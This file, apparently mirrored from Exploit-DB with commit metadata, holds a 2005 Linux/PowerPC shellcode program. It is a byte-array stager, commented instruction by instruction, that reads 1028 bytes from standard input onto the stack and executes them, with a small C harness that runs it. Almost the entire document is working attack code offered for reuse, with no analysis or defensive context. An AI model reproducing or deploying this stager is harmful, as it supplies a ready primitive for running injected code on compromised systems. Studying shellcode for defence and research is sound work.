exploit-db-mirror/shellcodes/linux_ppc/13302.c
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

21 lines
No EOL
663 B
C

/* readnexecppc-core.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */
"\x7c\x63\x1a\x79" /* xor. r3,r3,r3 */
"\x38\xa0\x04\x04" /* li r5,1028 */
"\x30\x05\xfb\xff" /* addic r0,r5,-1025 */
"\x7c\x24\x0b\x78" /* mr r4,r1 */
"\x44\xde\xad\xf2" /* sc */
"\x69\x69\x69\x69" /* nop */
"\x7c\x29\x03\xa6" /* mtctr r1 */
"\x4e\x80\x04\x21"; /* bctrl */
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte read & exec shellcode for linux/ppc by core\n",
strlen(hellcode));
shell();
return 0;
}
// milw0rm.com [2005-11-09]